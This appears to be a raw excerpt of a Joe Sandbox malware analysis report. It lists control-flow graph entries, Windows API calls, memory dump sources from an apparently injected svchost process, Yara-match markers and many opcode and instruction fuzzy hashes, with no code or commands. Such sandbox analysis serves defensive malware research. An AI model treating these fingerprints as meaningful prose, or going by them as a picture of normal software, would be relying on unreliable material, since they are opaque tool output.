
                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 42ce03-42ce44 call 404a33 call 42dce3 RtlFreeHeap
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE3F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: ^hA
                                        • API String ID: 3298025750-899435009
                                        • Opcode ID: 28ef2d6e509b58d6041715ca700afd5f36670ba15aff7ef934103d6af870da59
                                        • Instruction ID: fdc617434d5545c9e1daa8437f2128e021f07645669b461a9ac1447847a7b8af
                                        • Opcode Fuzzy Hash: 28ef2d6e509b58d6041715ca700afd5f36670ba15aff7ef934103d6af870da59
                                        • Instruction Fuzzy Hash: 95E092B17042147BD610EE5AEC41FEB77ACEFC9715F004019F948A7241D670B910CBB8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 58 42cdb3-42cdf4 call 404a33 call 42dce3 RtlAllocateHeap
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,0041E8FE,?,?,00000000,?,0041E8FE,?,?,?), ref: 0042CDEF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 758e987ca8dc1407da8ea2d75dd6bb0baa15a4ae5a41ed448168bd99f93428ac
                                        • Instruction ID: 17918fafe77d7918c94f1f76fa1d91a88606a9b90730fcf91da8eea324c1dce9
                                        • Opcode Fuzzy Hash: 758e987ca8dc1407da8ea2d75dd6bb0baa15a4ae5a41ed448168bd99f93428ac
                                        • Instruction Fuzzy Hash: F7E06DB16042087BD610EE99DC41FDB73ACEFC9715F000419FD08A7242D670B910CBB8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 68 42ce53-42ce8c call 404a33 call 42dce3 ExitProcess
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 4a72a8c2f97c2ed90bbe4c78ab3260a7f6740fedc81c4197864b34bdc353a8b3
                                        • Instruction ID: 7260838757c880d35975b7de4a4f432aa71238a31e89e9968f4fb0110fc70f5c
                                        • Opcode Fuzzy Hash: 4a72a8c2f97c2ed90bbe4c78ab3260a7f6740fedc81c4197864b34bdc353a8b3
                                        • Instruction Fuzzy Hash: 4AE086756002147BD520EA5ADC41FDB776CDFC5724F004419FA08A7142C7B07901C7F4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 73 3572c0a-3572c0f 74 3572c11-3572c18 73->74 75 3572c1f-3572c26 LdrInitializeThunk 73->75
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                        • Instruction ID: ae4038d81268c54db95a8d7c1132b0d3271e2478b71f2ebc004e3458dcd49d74
                                        • Opcode Fuzzy Hash: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                        • Instruction Fuzzy Hash: AFB09B719015C5D5DA11F76066087177949B7D0711F5DC461D3030647E4739C1D1E175
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: B3q$kLsE
                                        • API String ID: 3446177414-64223463
                                        • Opcode ID: 40b21b8a83ad24fb030fbdbe24c7ca5bdafe3afcf87cf2f163f53cffab0db4a7
                                        • Instruction ID: b4395baba6b0de67d85217a1c615f0dfe8e15b0ea48f7d630e784d5a3b051a45
                                        • Opcode Fuzzy Hash: 40b21b8a83ad24fb030fbdbe24c7ca5bdafe3afcf87cf2f163f53cffab0db4a7
                                        • Instruction Fuzzy Hash: 39419B31501B928AE331FFA9F844B697BE4BB90724F1A1618EC508F1EDCBB44481CB91
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                        • Instruction ID: f9bcff5d4f6bfd17a443b4adcabac56cfc75faa0c7d4e0e82633de4f6f442450
                                        • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                        • Instruction Fuzzy Hash: 33513675A00606DFCB18CF68D4916AEFBF1FF48314B18856ED819A7705E734EA80DB90
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                        • Instruction ID: 79c36234720274889e510d8a999a0b7425fa70a0e924b407cdc8139bfc2788b4
                                        • Opcode Fuzzy Hash: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                        • Instruction Fuzzy Hash: 86900231705804129140B25858C45864046E7E0311B99C011E4425559C8B148A565361
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31dcffc1fbd3a90979e6587558ba9047055818e266bc7392fdde24a3efc482fd
                                        • Instruction ID: 725dc15ce315458cdf11f315cd1665b47d02e2f842b1f75d7839558b388babb8
                                        • Opcode Fuzzy Hash: 31dcffc1fbd3a90979e6587558ba9047055818e266bc7392fdde24a3efc482fd
                                        • Instruction Fuzzy Hash: 5B90022130184842D140B3585844B4F4146D7E1312FD9C019A8157559CCA1589555721
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 604f5f1bc0520c4933bb851db82a789a24c3338a26db27cdcfe243a11e8ebf85
                                        • Instruction ID: d4fa7b74b01e4928e63248db0993e280967c0829d8b445ac48594cbe8e5df26b
                                        • Opcode Fuzzy Hash: 604f5f1bc0520c4933bb851db82a789a24c3338a26db27cdcfe243a11e8ebf85
                                        • Instruction Fuzzy Hash: 1D90022134140C02D140B25894547470047D7D0711F99C011A4025559D87168A6566B1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                        • Instruction ID: 1cdd0faeda76bb7300b6d1cc02c03c9f7f8ea72854ff8eb6bf320c4417342635
                                        • Opcode Fuzzy Hash: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                        • Instruction Fuzzy Hash: 29900261701504424140B25858444466046E7E13113D9C115A4555565C871889559269
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                        • Instruction ID: b3436e42d3914cf4c4cb3cffb2d4153c9b23ff6f79605a2cb47885fd604d6d6c
                                        • Opcode Fuzzy Hash: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                        • Instruction Fuzzy Hash: 9790023130140C02D180B258544468A0046D7D1311FD9C015A4026659DCB158B5977A1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                        • Instruction ID: feb61bbf589ed7805aec5d32ddd0d2438b9dcaf2427a6c7edc2e677004227c0c
                                        • Opcode Fuzzy Hash: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                        • Instruction Fuzzy Hash: BD90023130544C42D140B2585444A860056D7D0315F99C011A4065699D97258E55B661
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71a00c5a0b8843a29da09da231493e2d4aa9df3e2d5f424e2af303b0f5e10f63
                                        • Instruction ID: fe11128d522112e9bfb3d939bf68b84bd9de92b040a1e3e89b4b16b8c80f6ca6
                                        • Opcode Fuzzy Hash: 71a00c5a0b8843a29da09da231493e2d4aa9df3e2d5f424e2af303b0f5e10f63
                                        • Instruction Fuzzy Hash: 6790023130140C02D104B25858446C60046D7D0311F99C011AA02565AE976589917131
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                        • Instruction ID: 159e6b9a8c87ab6772aef97436f84bc157bd74f3fc7ec69429bb47341f37a4f7
                                        • Opcode Fuzzy Hash: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                        • Instruction Fuzzy Hash: D390023170540C02D150B25854547860046D7D0311F99C011A4025659D87558B5576A1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                        • Instruction ID: bb2d9ff60167903135882ab1c6a3556c71aab08f7e172c41589b85a04ffa86f1
                                        • Opcode Fuzzy Hash: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                        • Instruction Fuzzy Hash: DD900435311404030105F75C174454700C7D7D53713DDC031F5017555CD731CD715131
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                        • Instruction ID: 62eee3e28032652a3cee3761c5cd73f479c45e7deb2fa4ef879cd2002161097d
                                        • Opcode Fuzzy Hash: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                        • Instruction Fuzzy Hash: 71900225321404020145F658164454B0486E7D63613D9C015F5417595CC72189655321
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88c05dc81a4efefb074f3630795ea92c31b27a3b7664d6981422fac868f61a88
                                        • Instruction ID: d44e4679f7b2884c5a7f8f7452f7e7d6c045aa1b6e48e15a967e1f39ee9f6865
                                        • Opcode Fuzzy Hash: 88c05dc81a4efefb074f3630795ea92c31b27a3b7664d6981422fac868f61a88
                                        • Instruction Fuzzy Hash: 7E9002A1301544924500F3589444B4A4546D7E0311B99C016E5055565CC62589519135
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                        • Instruction ID: 295967581174012070ee20fa07e333704b256ffe5d27894d0e01658dd420e91f
                                        • Opcode Fuzzy Hash: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                        • Instruction Fuzzy Hash: 0A90022134545502D150B25C54446564046F7E0311F99C021A4815599D865589556221
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cdad86cdec1ba73bae603606ec15570a68353e5602ca86dd81c930688f77d2d3
                                        • Instruction ID: 396880b235dc81a4106016e1f60fbc43d815bc4c2171ae6747009a0183ed9211
                                        • Opcode Fuzzy Hash: cdad86cdec1ba73bae603606ec15570a68353e5602ca86dd81c930688f77d2d3
                                        • Instruction Fuzzy Hash: 1D90026131140442D104B25854447460086D7E1311F99C012A6155559CC6298D615125
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                        • Instruction ID: 6d5b222a0f62db53fc5b95ab31557e7ee5b50262cf3aab6058fa01a1d96d82b1
                                        • Opcode Fuzzy Hash: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                        • Instruction Fuzzy Hash: F090026134140842D100B2585454B460046D7E1311F99C015E5065559D8719CD526126
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                        • Instruction ID: eae4651246cda45a2ccbe3c396d0afd765965ca343e324362d4f29e71bd95b34
                                        • Opcode Fuzzy Hash: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                        • Instruction Fuzzy Hash: 15900221311C0442D200B6685C54B470046D7D0313F99C115A4155559CCA1589615521
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74eadc964dc2e242ef867ab2c9fe94fda5aa9d418e8382548ec3457d6e4ad965
                                        • Instruction ID: 1bef5c8d0207ecde6fbb0e7a0ad96c126950642d87bc709aa76d4adbb12960fc
                                        • Opcode Fuzzy Hash: 74eadc964dc2e242ef867ab2c9fe94fda5aa9d418e8382548ec3457d6e4ad965
                                        • Instruction Fuzzy Hash: 4490023130180802D100B258585474B0046D7D0312F99C011A516555AD872589516571
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                        • Instruction ID: 5dde4f39399ffbcb89e53f09c5812cf7512857b0504eec7f22b9ae50fcd4ae15
                                        • Opcode Fuzzy Hash: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                        • Instruction Fuzzy Hash: 57900221701404424140B26898849464046FBE1321799C121A4999555D865989655665
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e348a4369b9f01274df0dce38c20845552f1bc3f554748377c6b719431690f2
                                        • Instruction ID: 2a52f9024985625a35228607adf529c686776722854a82bee215f0148f9ee1b8
                                        • Opcode Fuzzy Hash: 0e348a4369b9f01274df0dce38c20845552f1bc3f554748377c6b719431690f2
                                        • Instruction Fuzzy Hash: C490023130180802D100B25858487870046D7D0312F99C011A916555AE8765C9916531
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4d8c247e94624f7080ba50ddc4764f40f93c74e649e8090d1c88e6472519728
                                        • Instruction ID: 68021ea4a0da35a5a17ebbc251a502f79cbe20acbb54d5c2031753f4ebbad56c
                                        • Opcode Fuzzy Hash: d4d8c247e94624f7080ba50ddc4764f40f93c74e649e8090d1c88e6472519728
                                        • Instruction Fuzzy Hash: 6E90022130140802D102B2585454646004AD7D1355FD9C012E542555AD87258A53A132
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                        • Instruction ID: 957ebda07f91b14d52a41c8cbd5ace61a48632d2c21951bdcd93ff4b771760cc
                                        • Opcode Fuzzy Hash: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                        • Instruction Fuzzy Hash: DF90026130180803D140B65858446470046D7D0312F99C011A606555AE8B298D516135
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                        • Instruction ID: 2854e459298965992e089223f5fe7da0ffbabcac43467303c941df2e6f18af77
                                        • Opcode Fuzzy Hash: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                        • Instruction Fuzzy Hash: 5590022170140902D101B2585444656004BD7D0351FD9C022A502555AECB258A92A131
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6dd7023d4e10fe679fb034a46f6fda023c18e0241e22eda39165a57ae6960bd
                                        • Instruction ID: eeaaae0cd9df035439bb8455803262523354238797e057d89ff76932e5b38a24
                                        • Opcode Fuzzy Hash: f6dd7023d4e10fe679fb034a46f6fda023c18e0241e22eda39165a57ae6960bd
                                        • Instruction Fuzzy Hash: 1590027130140802D140B25854447860046D7D0311F99C011A9065559E87598ED56665
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9a2f59726974d61c849b76853438de963c31a53820de89812c8530e497980c3
                                        • Instruction ID: 00dcf0199389df2eae0d2c9f1925f354bafe1838f0e757886f3747e147a580a0
                                        • Opcode Fuzzy Hash: f9a2f59726974d61c849b76853438de963c31a53820de89812c8530e497980c3
                                        • Instruction Fuzzy Hash: 1690023530140802D510B25868446860087D7D0311F99D411A442555DD875489A1A121
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                        • Instruction ID: a66a380f2618cf76aed092c2962f9eb370a9acc3360d389fd048201e447ead72
                                        • Opcode Fuzzy Hash: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                        • Instruction Fuzzy Hash: 6590022931340402D180B258644864A0046D7D1312FD9D415A401655DCCA1589695321
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 285eeaf31c5ff8db7ee729ab7021d81386f8c406f565827b0b888440d68e14f3
                                        • Instruction ID: dbdc6b4029b30cfd35f65941ee9d7fffc5e42aba63644e0838d67084707c9ee2
                                        • Opcode Fuzzy Hash: 285eeaf31c5ff8db7ee729ab7021d81386f8c406f565827b0b888440d68e14f3
                                        • Instruction Fuzzy Hash: 6A900231302405429540B3586844A8E4146D7E1312BD9D415A4016559CCA1489615221
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19d69f3689826c0121de0b80fd56ca17b2376ed5ad2333483b4d9718b66a6d09
                                        • Instruction ID: 286c42376383803e8eb65c63f6607b63e73c33051ad2f75a088a90b599c5f73b
                                        • Opcode Fuzzy Hash: 19d69f3689826c0121de0b80fd56ca17b2376ed5ad2333483b4d9718b66a6d09
                                        • Instruction Fuzzy Hash: 4390022130544842D100B6586448A460046D7D0315F99D011A506559ADC7358951A131
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                        • Instruction ID: 02f3288c67d0b8e74ae7417ae34ee6e3f84eda75accf350528d982ea127402e2
                                        • Opcode Fuzzy Hash: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                        • Instruction Fuzzy Hash: B790022130140403D140B25864586464046E7E1311F99D011E4415559CDA1589565222
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                        • Instruction ID: f2beaaa74330732e25fd8a08b949f1543cbd948280e184a31abf589d3ad3703d
                                        • Opcode Fuzzy Hash: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                        • Instruction Fuzzy Hash: FC900221342445525545F25854445474047E7E03517D9C012A5415955C86269956D621
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: edda34ac59d482f2518c5f737391333381d2fa4c1f7f9f5da0158d92809da845
                                        • Instruction ID: a3a164afe3965c6718d33a1b705aafba5700447578cf289c2fbdf77623c35e5c
                                        • Opcode Fuzzy Hash: edda34ac59d482f2518c5f737391333381d2fa4c1f7f9f5da0158d92809da845
                                        • Instruction Fuzzy Hash: AF90023134140802D141B2585444646004AE7D0351FD9C012A4425559E87558B56AA61
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                        • Instruction ID: 4d0691fd16245d2f77c510a439641c8e8bbd8c8539167eab49d681fad819afb8
                                        • Opcode Fuzzy Hash: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                        • Instruction Fuzzy Hash: 7C90023130148C02D110B258944478A0046D7D0311F9DC411A842565DD879589917121
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
